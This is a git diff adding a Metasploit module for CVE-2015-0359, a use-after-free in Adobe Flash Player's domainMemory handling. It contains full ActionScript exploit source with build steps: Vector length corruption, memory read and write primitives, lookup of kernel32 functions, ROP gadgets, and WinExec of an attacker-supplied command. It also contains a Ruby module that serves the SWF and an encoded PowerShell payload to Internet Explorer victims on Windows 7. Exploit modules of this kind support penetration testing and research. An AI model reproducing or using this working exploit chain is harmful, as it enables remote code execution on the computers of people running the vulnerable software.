zDMp!Ny^LEIFC?nqxF^3z@FSChoBpzv_Pin=v~FvomBo|QvYdKyrGT^i zBOwOzO+p23xo9i9JApM#r+FOZvxn0FqMMwg!NkFCSKG!uNW^Hesdh`9DT>aAe(aUW zkq-{nHwT64OR21%JvgW$%7*s4HKePJ>jqNY>e!6o*tKB&)8xRiuxS*QgDXEZMTpMD zm?am+o@QRQ1OB27r@uVbMWBYe9*+aUD~J# zFo_|5HM*pGu7^2MH;AAcBR;6a$m~`1 z3Zd;q&-}6^yND6;4{ZS&)$5JJ{8||yT0usr`r1v9xL9BBtfm%H)KufFc$jP( z6q)m)2pt8G?~(;n+n(LOHP|C|azA>3VKrS@G1L5v=GQ!iaSE1%G%G~$AV~ZHm9wAE zTt>dR`#23Q+hO0Jj^O?y()&tQ4IB$`WKFl}#S#*4@NazH5ywD+IVB(f-~iJ|&Z^*Z clE;ovi+sQcg&$q=86_sHwNW(x{|x%W0H|{{(f|Me literal 0 HcmV?d00001 diff --git a/external/source/exploits/CVE-2015-0359/Msf.as b/external/source/exploits/CVE-2015-0359/Msf.as new file mode 100755 index 0000000000..1bf0cd1947 --- /dev/null +++ b/external/source/exploits/CVE-2015-0359/Msf.as @@ -0,0 +1,261 @@ +// Build how to: +// 1. Download the AIRSDK, and use its compiler. +// 2. Be support to support 16.0 as target-player (flex-config.xml). +// 3. Download the Flex SDK (4.6) +// 4. Copy the Flex SDK libs (/framework/libs) to the AIRSDK folder (/framework/libs) +// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder) +// 5. Build with: mxmlc -o msf.swf Msf.as + +// Original code by @hdarwin89 modified to be used from msf +// https://git.hacklab.kr/snippets/13 +// http://pastebin.com/Wj3NViUu + +package +{ + import flash.display.Sprite + import flash.events.Event + import flash.utils.ByteArray + import flash.system.Worker + import flash.system.WorkerDomain + import flash.system.MessageChannel + import flash.system.ApplicationDomain + import avm2.intrinsics.memory.casi32 + import flash.display.LoaderInfo + import mx.utils.Base64Decoder + + public class Msf extends Sprite + { + private var ov:Vector. = new Vector.(25600) + private var uv:Vector. = new Vector. + private var ba:ByteArray = new ByteArray() + private var stack:Vector. = new Vector.(0x6400) + private var payload_space:Vector. = new Vector.(0x6400) + private var b64:Base64Decoder = new Base64Decoder() + private var payload:String = "" + private var worker:Worker + private var mc:MessageChannel + + public function Msf() + { + if (Worker.current.isPrimordial) mainThread() + else workerThread() + } + + private function mainThread():void + { + b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) + payload = b64.toByteArray().toString() + ba.length = 0x1000 + ba.shareable = true + for (var i:uint = 0; i < ov.length; i++) { + ov[i] = new Vector.(1014) + ov[i][0] = ba + ov[i][1] = this + ov[i][2] = stack + ov[i][3] = payload_space + } + for (i = 0; i < ov.length; i += 2) delete(ov[i]) + worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes) + mc = worker.createMessageChannel(Worker.current) + mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage) + worker.setSharedProperty("mc", mc) + worker.setSharedProperty("ba", ba) + ApplicationDomain.currentDomain.domainMemory = ba + worker.start() + } + + private function workerThread():void + { + var ba:ByteArray = Worker.current.getSharedProperty("ba") + var mc:MessageChannel = Worker.current.getSharedProperty("mc") + var tmp:ByteArray = new ByteArray() + tmp.length = 0x2000 + + for (var i:uint = 0; i < 20; i++) { + new Vector.(1022) + } + + ba.writeBytes(tmp) + ov[0] = new Vector.(1022) + + mc.send("") + while (mc.messageAvailable); + + // Vector length corruption didn't work, aborting... + if (ov[0].length != 0xffffffff) { + return + } + + // Bad memory layout :( restoring length, and aborting... + if (ov[0][0x407] != 0x3f6) { + ov[0][0x3ffffffe] = 1022 + return + } + + ov[0][0] = ov[0][0x403] - 0x18 - 0x1000 + var buffer:uint = vector_read(vector_read(ov[0][0x408] - 1 + 0x40) + 8) //+ 0x100000 + var main:uint = ov[0][0x409] - 1 + var stack_object:uint = ov[0][0x40a] - 1 + var payload_space_object:uint = ov[0][0x40b] - 1 + var vtable:uint = vector_read(main) + var stack_address:uint = vector_read(stack_object + 0x18) as uint + var payload_address:uint = vector_read(payload_space_object + 0x18) as uint + vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 8) + vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 16, 0xffffffff) + mc.send(buffer.toString() + "/" + main.toString() + "/" + vtable.toString() + "/" + stack_address.toString() + "/" + payload_address.toString()) + } + + private function onMessage(e:Event):void + { + casi32(0, 1022, 0xFFFFFFFF) + if (ba.length != 0xffffffff) mc.receive() + else { + // Restoring vector length + var res:uint = casi32(0, 0xffffffff, 1022) + if (res != 0xffffffff) { // Something has been wrong... aborting + return + } + ba.endian = "littleEndian" + var data:Array = (mc.receive() as String).split("/") + var buffer:uint = parseInt(data[0]) as uint + var main:uint = parseInt(data[1]) as uint + var vtable:uint = parseInt(data[2]) as uint + var stack_address:uint = parseInt(data[3]) as uint + var payload_address:uint = parseInt(data[4]) as uint + var flash:uint = base(vtable) + var winmm:uint = module("winmm.dll", flash) + var kernel32:uint = module("kernel32.dll", winmm) + var virtualprotect:uint = procedure("VirtualProtect", kernel32) + var winexec:uint = procedure("WinExec", kernel32) + var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash) + var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash) + + // Continuation of execution + byte_write(buffer + 0x10, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable + byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main + byte_write(0, "\x89\x03", false) // mov [ebx], eax + byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret + + // Put the payload (command) in memory + byte_write(payload_address + 8, payload, true); // payload + + // Put the fake vtabe / stack on memory + byte_write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability... + byte_write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h] + byte_write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot + byte_write(0, virtualprotect) + + // VirtualProtect + byte_write(0, winexec) + byte_write(0, buffer + 0x10) + byte_write(0, 0x1000) + byte_write(0, 0x40) + byte_write(0, buffer + 0x8) // Writable address (4 bytes) + + // WinExec + byte_write(0, buffer + 0x10) + byte_write(0, payload_address + 8) + byte_write(0) + + byte_write(main, stack_address + 0x18000) // overwrite with fake vtable + + toString() // call method in the fake vtable + } + } + + private function vector_write(addr:uint, value:uint = 0):void + { + var pos:uint = 0 + + if (addr > ov[0][0]) { + pos = ((addr - ov[0][0]) / 4) - 2 + } else { + pos = ((0xffffffff - (ov[0][0] - addr)) / 4) - 1 + } + + ov[0][pos] = value + } + + private function vector_read(addr:uint):uint + { + var pos:uint = 0 + + if (addr > ov[0][0]) { + pos = ((addr - ov[0][0]) / 4) - 2 + } else { + pos = ((0xffffffff - (ov[0][0] - addr)) / 4) - 1 + } + + return ov[0][pos] + } + + private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void + { + if (addr) ba.position = addr + if (value is String) { + for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i)) + if (zero) ba.writeByte(0) + } else ba.writeUnsignedInt(value) + } + + private function byte_read(addr:uint, type:String = "dword"):uint + { + ba.position = addr + switch(type) { + case "dword": + return ba.readUnsignedInt() + case "word": + return ba.readUnsignedShort() + case "byte": + return ba.readUnsignedByte() + } + return 0 + } + + private function base(addr:uint):uint + { + addr &= 0xffff0000 + while (true) { + if (byte_read(addr) == 0x00905a4d) return addr + addr -= 0x10000 + } + return 0 + } + + private function module(name:String, addr:uint):uint + { + var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1 + while (true) { + var entry:uint = byte_read(iat + (++i) * 0x14 + 12) + if (!entry) throw new Error("FAIL!"); + ba.position = addr + entry + if (ba.readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break + } + return base(byte_read(addr + byte_read(iat + i * 0x14 + 16))) + } + + private function procedure(name:String, addr:uint):uint + { + var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78) + var numberOfNames:uint = byte_read(eat + 0x18) + var addressOfFunctions:uint = addr + byte_read(eat + 0x1c) + var addressOfNames:uint = addr + byte_read(eat + 0x20) + var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24) + for (var i:uint = 0; ; i++) { + var entry:uint = byte_read(addressOfNames + i * 4) + ba.position = addr + entry + if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break + } + return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4) + } + + private function gadget(gadget:String, hint:uint, addr:uint):uint + { + var find:uint = 0 + var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50) + var value:uint = parseInt(gadget, 16) + for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break + return addr + i + } + } +} diff --git a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb new file mode 100644 index 0000000000..76b798a401 --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb @@ -0,0 +1,112 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free', + 'Description' => %q{ + This module exploits a use-after-free vulnerability in Adobe Flash Player. The + vulnerability occurs when the ByteArray assigned to the current ApplicationDomain + is freed from an ActionScript worker, when forcing a reallocation by copying more + contents than the original capacity, but Flash forgets to update the domainMemory + pointer, leading to a use-after-free situation when the main worker references the + domainMemory again. This module has been tested successfully on Windows 7 SP1 + (32-bit), IE 8 and IE11 with Flash 17.0.0.134. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'bilou', # Vulnerability discovery according to Flash Advisory + 'Unknown', # Exploit in the wild + 'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one) + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2015-0359'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], + ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'], + ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'], + ['URL', 'https://git.hacklab.kr/snippets/13'], + ['URL', 'http://pastebin.com/Wj3NViUu'] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => OperatingSystems::Match::WINDOWS_7, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') }, + :arch => ARCH_X86 + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 14 2014', + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status('Sending SWF...') + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) + return + end + + print_status('Sending HTML...') + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + target_payload = get_payload(cli, target_info) + psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) + b64_payload = Rex::Text.encode_base64(psh_payload) + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf') + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end